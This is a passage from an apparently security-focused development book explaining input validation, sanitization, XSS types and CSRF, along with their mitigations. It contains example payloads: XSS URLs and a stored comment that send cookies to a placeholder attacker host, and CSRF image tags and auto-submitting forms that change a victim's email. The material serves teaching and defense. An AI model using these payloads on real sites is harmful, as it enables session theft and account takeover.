Sharks in the Moat

by Phil Martin


  We haven’t even mentioned the possibility of the attacker using a tool such as Fiddler to craft the entire request – every form field and HTTP header – without using a browser. Lesson learned – NEVER TRUST THE CLIENT. Always, always, always implement server-side validation! I am routinely amazed at the number of ‘senior developers’ who fail to grasp this basic concept.

  After discussing the how and where, let’s talk about what to validate. While any aspect of data is a candidate for input validation, at a minimum the following should be considered:

  The type of data.

  The range of allowed values.

  The length of the data.

  The format of the data.

  If multiple data points are submitted, such as selections from a multi-select list, whether they are allowed together as a group.

  Whether there are alternative representations of the data, and what its canonical form is.
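  As a concrete sketch, a server-side check for a single hypothetical ‘quantity’ field covering type, length, format and range might look something like this:

    // Illustrative only – the field name, limits and pattern are assumptions.
    function isValidQuantity(value) {
      if (typeof value !== 'string') return false;               // type
      if (value.length === 0 || value.length > 4) return false;  // length
      if (!/^[0-9]+$/.test(value)) return false;                 // format (whitelist of digits)
      var n = parseInt(value, 10);
      return n >= 1 && n <= 100;                                  // range
    }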

  Sanitization

  When we convert data that could be dangerous into a form that is safe for processing and storage, we are sanitizing the data. This applies to both input and output.

  We can use three different methods to sanitize data – stripping, substitution or literalization. For the following examples, let’s assume an attacker sends the following dangerous input data:
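  (a representative payload; the exact string is illustrative)

    <script>alert('Hacked!');</script>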

  Stripping removes dangerous characters from a string of input data. When we strip dangerous characters such as ‘<>();/’, we wind up with:
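  (applying this to the illustrative payload above)

    scriptalert'Hacked!'script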

  which will not be executed.

  With substitution we replace dangerous characters with a substitute that is not dangerous. In our example above, if we substitute HTML encoded characters for less than and greater than symbols, we wind up with:
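  (again applied to the illustrative payload)

    &lt;script&gt;alert('Hacked!');&lt;/script&gt;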

  This will also not be executed as it is not recognized as a script block. The two most commonly used approaches to substitution are encoding schemes. HTML encoding converts characters to their HTML equivalents – this is the example we just covered. URL encoding converts textual URLs to a form that is safe to transmit over a network. For example, the character ‘/’ can mean something special to code that processes a URL, so all ‘/’ characters are instead converted to ‘%2f’. It is important to transform these alternative forms back into the canonical form before performing validation.

  Finally, we can use literalization to convert proper HTML to its textual representation. As an example, we can skip the innerHTML form and instead use the innerText form.
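  A minimal sketch of the difference (the element id ‘comment’ is a placeholder):

    // innerText renders the string as literal text, whereas
    // innerHTML would parse it as markup and execute the script.
    var untrustedInput = "<script>alert('Hacked!')<\/script>";      // attacker-supplied value
    document.getElementById('comment').innerText = untrustedInput;  // shown as plain text, never executed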

  While sanitization techniques can render dangerous input impotent, they can also negatively impact the integrity of the data. For example, suppose we receive an input value of “Orielly’s Bucket” and perform an encoding substitution (“’” = “%27”) that results in “Orielly%27s Bucket”, which is then stored. When a user views this data element they will see the following:

  Location: Orielly%27s Bucket

  Which is hardly user-friendly. It can get even worse though. If we also encode suspect characters when outputting data to a browser, we will be guilty of double encoding the ‘%’ sign (“%”=”%25”), resulting in:

  Location: Orielly%2527s Bucket

  One solution to this problem is to encode data before storage, reverse the encoding upon retrieval, and use innerText to display the information in the browser:

  Received: Orielly’s Bucket

  Stored: Orielly%27s Bucket

  Retrieved: Orielly’s Bucket

  Browser: document.getElementById('myDiv').innerText = getLocationValue();
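  Put together in code, that round trip might look something like this (the element id and encoding choice are illustrative):

    var received = "Orielly's Bucket";
    var stored = received.replace(/'/g, '%27');       // encode before storage: "Orielly%27s Bucket"
    var retrieved = stored.replace(/%27/g, "'");      // reverse the encoding upon retrieval
    document.getElementById('myDiv').innerText = retrieved;  // display safely in the browser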

  That’s a lot of work but saves us a world of hurt when we get hacked.

  XSS

  When I first ran across XSS, I had a very difficult time wrapping my mind around how such an attack works and the various flavors that are out there. So, we are going to take our time and describe how the attacks are carried out with examples to ensure you grasp both the power and danger of this specific attack vector. Cross-site scripting, or XSS, is based on the ability of an attacker to use a script as an input into a system, and somehow get the system to reflect that script back out such that it is executed in the browser. Some experts refer to this attack as a ‘1-2 punch’ since it really is comprised of two vulnerabilities – an injection flaw that allows a script block to be input into a system, and the resulting XSS weakness that allows the script block to be reflected back out to the browser. There are three different types of XSS:

  Non-persisted or Reflected

  Persistent or Stored

  DOM-based

  Let’s take them one at a time.

  Non-persisted or Reflected XSS

  In this most basic case, the system accepts the input script but does not store it in a database or other persistent repository. Instead, the system simply reflects the script right back to the browser. For example, if I were to type in the following URL...

  http://www.vulnerablesite.com/foo

  ...and got back a web page whose HTML source included something along these lines…

  <html>
    <body>
      Unable to locate the page 'foo'.
    </body>
  </html>
  ...I could instead type in a URL such as this…

  http://www.vulnerablesite.com/<script>alert('Hi!')</script>

  …resulting in HTML along these lines being reflected back from the server:

  <html>
    <body>
      Unable to locate the page '<script>alert('Hi!')</script>'.
    </body>
  </html>

  When the browser receives this page, it will immediately pop up an alert that says ‘Hi!’. This example illustrates an injection flaw, where the system accepts an invalid URL and processes it, and a reflection vulnerability where the invalid information is reflected back to the browser in such a way that it is executed.

  Now, how would an attacker use such an attack? It does no good for him to simply alter the URL in his own browser – he already has complete access to whatever is in the browser. Instead, an attacker will craft a URL exploiting the weakness and trick other people into loading his URL into their own browser. This might include sending out emails hoping someone will click on the malicious link, or simply embedding the link on a trusted web site. As an example, suppose an attacker convinces cnn.com to show a link with a URL along these lines (here ‘attackersite.com’ stands in for a server the attacker controls):

  http://www.vulnerablesite.com/<script>document.location='http://attackersite.com/steal?cookie='+document.cookie;</script>

  When the user clicks on the link, it will redirect the browser to the legitimate site – www.vulnerablesite.com in this example. The web server at this site will then send the script specified in the URL back to the browser where it is executed as we illustrated earlier. The browser will then load the cookie for www.vulnerablesite.com and send it to the attacker’s site. If the cookie contains a legitimate session ID or unencrypted sensitive information, then the attacker now has it!

  Or, even simpler, perhaps the CNN website simply reflects a script that is executed without the user having to click a link. As soon as the page loads, the malicious script is executed. Now, how does the attacker get cnn.com to do that? He must execute the second type of XSS – persistent XSS.

  Persistent or Stored XSS

  In 2005, Samy Kamkar released an XSS worm called ‘Samy’ on the then-popular MySpace site. Within 20 hours it had propagated to over 1 million users, earning it the title of the fastest-spreading virus of all time, a statistic that still stands today. Fortunately, all the virus did was display the text ‘but most of all, samy is my hero’ on each person’s public profile and then send Samy’s account a friend request. The snippet of code Samy injected into the web site is shown in Figure 86.

  Figure 86: The Samy Virus

  The exploit took advantage of a weakness allowing the attacker to get his script to be stored in the MySpace database, and then to be reflected back when someone’s profile was displayed. Because the offending script was persisted on the backend, it differs from simply being reflected. This type of approach requires the server application to accept input – usually in an INPUT or TEXTAREA form field – and store it in a database without first sanitizing the content.

  Returning to our previous example of stealing cookies by injecting an XSS script into cnn.com, the cnn.com web site would have to be vulnerable to some type of injection flaw which was then persisted. Here are the steps required to carry out that attack:

  1) The attacker gains access to a cnn.com page that accepts user input – perhaps a mechanism allowing readers to comment on a story.

  2) The attacker types in his malicious script as a comment and submits it.

  3) The website does not sanitize the input and stores it in the backend database as a comment for the story.

  4) An unsuspecting visitor reads the story, which is sent back to the browser along with all comments.

  5) One of the comments contains the script, which executes as soon as the page is loaded.

  In this scenario, the user doesn’t have to do anything but visit the page, and the attacker’s script is executed without the user’s knowledge.
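  For example, the comment submitted in step 2 might look something like this (attackersite.com again stands in for a server the attacker controls):

    Great story! <script>new Image().src='http://attackersite.com/steal?cookie='+encodeURIComponent(document.cookie);</script>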

  DOM-based XSS

  The third type of XSS attack is to modify the contents of the web page after it has been loaded from the server. While both non-persisted and persisted XSS attacks trick the server into emitting malicious code back to the browser, a DOM-based attack takes advantage of a weakness in the way a page is constructed.

  For example, suppose that a vulnerable site had the following source code sent to the browser:
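  (a representative page that blindly writes whatever follows the ‘#’ in its own URL into the document; the markup here is illustrative)

    <html>
      <body>
        <script>
          // Write everything after the '#' directly into the page.
          var pos = document.URL.indexOf('#') + 1;
          document.write(document.URL.substring(pos));
        </script>
      </body>
    </html>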

  If we were to use the following URL:
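  (the same illustrative cookie-stealing URL from before, now with a ‘#’ in front of the script)

    http://www.vulnerablesite.com/#<script>document.location='http://attackersite.com/steal?cookie='+document.cookie;</script>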

  The page would then call the malicious website and send it the cookie for www.vulnerablesite.com. You might have noticed that this is almost exactly the same URL we used for the reflected XSS attack. The difference is that because we used the ‘#’ symbol, anything after it is never sent to the server, and therefore the server has no chance to perform any type of sanitization or validation of the input text. Whereas reflected XSS requires the server to emit our dangerous script back to the browser, a DOM-based vulnerability only requires the HTML page to be poorly written. Everything with a DOM-based attack happens in the browser, not the server. The delivery vehicle is the same as with a reflected XSS attack – get the user to somehow click on a malformed link. Amazingly, around 50% of all sites world-wide are vulnerable to such an attack.

  Mitigating XSS Attacks

  For both reflected and persisted XSS attacks, all user input should be sanitized before processing is carried out. All output back to the browser should be escaped. For example, when a user inserts a script tag into the URL, such as:
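  (repeating our earlier reflected XSS example)

    http://www.vulnerablesite.com/<script>alert('Hi!')</script>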

  the offending URL should be escaped by replacing dangerous characters with their HTML-encoded equivalents. For example, all less-than and greater-than signs should be replaced with ‘&lt;’ and ‘&gt;’ respectively:
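  (the escaped form of the URL above)

    http://www.vulnerablesite.com/&lt;script&gt;alert('Hi!')&lt;/script&gt;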

  This will effectively render the dangerous script impotent. This type of sanitization should be carried out before data is persisted as well. Sanitization routines should employ a whitelist of acceptable characters instead of looking for known dangerous characters. All input must be fully decoded before validation occurs, as some types of encoding can hide the original content. Some servers provide a native capability to detect dangerous input, such as the validateRequest flag for .Net applications. At times, an attacker will attempt to upload HTML-based files with the hope of getting the server to display them for other users. To prevent this, servers should not allow the upload of any file with an HTM or HTML extension. Use secure server-side libraries such as Microsoft’s Anti-Cross Site Scripting, OWASP’s ESAPI Encoding module, Apache Wicket or the SAP Output Encoding frameworks.

  If an application absolutely must generate content after being loaded into a browser, employ the innerText property of an HTML element instead of the innerHTML property. innerText will normally prevent execution of rogue content. Avoid use of capabilities such as ‘document.write’ and instead explicitly load dynamic content into existing DIV or SPAN tags using the innerText property.

  A rather useless action that many sources will recommend is to disable scripting in the browser. While this technically is a great security mechanism, from a psychological acceptability standpoint few users will stand for it, as it effectively rolls the user experience back to a pre-2000 state. A better approach is to properly implement sanitization and validation controls instead of adopting such a nuclear option. The blast radius might very well include the loss of your job when users revolt!

  If cookies retain sensitive information that is not used by browser code, it is a good idea to enable the HttpOnly flag so that the cookie contents cannot be accessed by rogue XSS scripts. Note that not all browsers respect this flag.
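  For example, a response header that puts the session cookie out of reach of script might look like this (the cookie name and value are illustrative):

    Set-Cookie: sessionid=38afes7a8; HttpOnly; Secure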

  In the event that a legacy or third-party web application cannot be updated due to the lack of source code or the cost involved, an application-layer firewall can help out. This is only a last-resort method, however.

  CSRF

  Any website that does not implement some form of session management is pretty much unusable if any sensitive data is to be accessed. For example, it is not reasonable to expect a user to provide their username and password for every single page request between the browser and server. The only legitimate answer is to implement some type of session token that is automatically passed from the browser to the server on every request. This token can be sent as part of the URL – which is NOT the recommended approach – or stored as a cookie, or even in HTML5 local storage. Cookies are sent with every HTTP request to the server, while script is required with HTML5 local storage to retrieve the token and send it programmatically to the server. By far the most common approach is to use a cookie to store the token, and that is the weakness that cross-site request forgery, or CSRF, takes advantage of.

  CSRF is a huge concern and is consistently listed in both the OWASP Top 10 and the CWE/SANS Top 25 vulnerabilities. This attack requires the user to already be authenticated into the vulnerable website through some pre-authorized mechanism that the attacker will not have direct access to. In other words, this attack depends on the user being able to visit the website and be automatically authenticated in some way without having to type in their credentials. This can happen in two ways – unexpired session tokens or a ‘remember me’ feature.

  When an unexpired session token is stored in a cookie, every request between the browser and web server will include the cookie for that site. The majority of sites use a cookie to store the session token for two primary reasons – it is hidden from the user to discourage tampering, and it does not require the user to do anything special. Remember that a session token is just a string of clear text characters and should eventually expire.

  When a ‘remember me’ feature is used, the actual username and password are stored – hopefully encrypted – in the cookie. This feature is normally used in tandem with a session cookie. In this case though, when the session token expires, the site simply digs in and retrieves the credentials to create a brand-new session token – the user does not have to reauthenticate even when their session expires. While this is a great usability feature, it is an extremely poor security feature and should be aggressively avoided.

  Now that we have set up the base requirements for CSRF, let’s see how it actually works. The first and most dangerous scenario, shown in Figure 87, only requires the victim to visit a web page containing a malicious tag – the user does not have to take any action, and the attack is carried out without him or her even being aware it is going on. For our scenario, let’s assume the vulnerable web site allows the email address of record to be changed using a simple GET request:
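  (an illustrative request; the path, parameter name and new address are made up)

    http://www.vulnerablesite.com/[email protected]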

  Figure 87: CSRF Attack Requiring No User Action

  Because the site cookie is automatically sent along with the request, the server will authorize the request based on the active session token and change the email address.

  Now, let’s assume the victim visits the malicious website, which has the following tag embedded in the page:
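  (an illustrative tag reusing the same email-change request)

    <img src="http://www.vulnerablesite.com/[email protected]" width="1" height="1" />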

  As soon as the user visits the malicious web site, the user’s browser will attempt to load the image from vulnerablesite.com using a GET request. It doesn’t matter that an actual image is not being requested – as far as vulnerablesite.com is concerned, a browser just sent a GET request to change the email address of the current user. When the image tag executes the request, guess what is sent right along with it? You got it – the cookie with the unexpired session token. The server dutifully confirms that the token is valid and changes the email address for the user. All without the user or web server knowing something hinky is going on. Now how did the attacker get the user to visit their evil website? Usually through a phishing email containing a link, but he could also have embedded his link in an ad on a legitimate site, or perhaps posted the IMG tag in a comment or user post on a site the user frequents.

  The next scenario uses the same tactic but instead tricks the user into clicking the link. For example, the malicious HTML might be:
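  (again illustrative)

    <a href="http://www.vulnerablesite.com/[email protected]">Click here to claim your prize!</a>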

  This is exactly the same attack but does require the user to click on something.

  Now, let’s suppose that the owner of the vulnerable site gets wind of these attacks, and decides to turn the GET request into a POST in order to defeat the attacker. While this definitely does increase the effort, it is not fool-proof. The third scenario shows how to get around such a problem.

  Here, the tag no longer works, but if we can get a user to click a link, then we simply create a POST form and submit it. For example, we can implement the following:
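  (a sketch; the form action and field name are illustrative)

    <form action="http://www.vulnerablesite.com/updateemail" method="POST">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="submit" value="Click here to claim your prize!" />
    </form>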

  In fact, we can even use this code to automatically execute when the page is loaded, thereby removing the need for the user to take any action:
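  (an illustrative page that submits the hidden form as soon as it loads)

    <body onload="document.forms[0].submit()">
      <form action="http://www.vulnerablesite.com/updateemail" method="POST">
        <input type="hidden" name="email" value="[email protected]" />
      </form>
    </body>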

  So, simply converting to a POST mechanism really doesn’t solve much. But it gets even worse. If we combine CSRF with XSS, the impact can be devastating. Recall that persisted XSS requires us to somehow get the server to store our malicious code and reflect it back out to victims. Well, CSRF is a great way to inject our XSS payload. In fact, XSS worms which replicate themselves across many users for a single site often use CSRF to perform the initial infection. So, we use CSRF as the vehicle to deliver the malicious XSS code and get it persisted on the vulnerable site. By using CSRF, we do not have to know any valid credentials. And, since CSRF requests are seen by the server as a legitimate request, they usually go unnoticed for a long time.

 
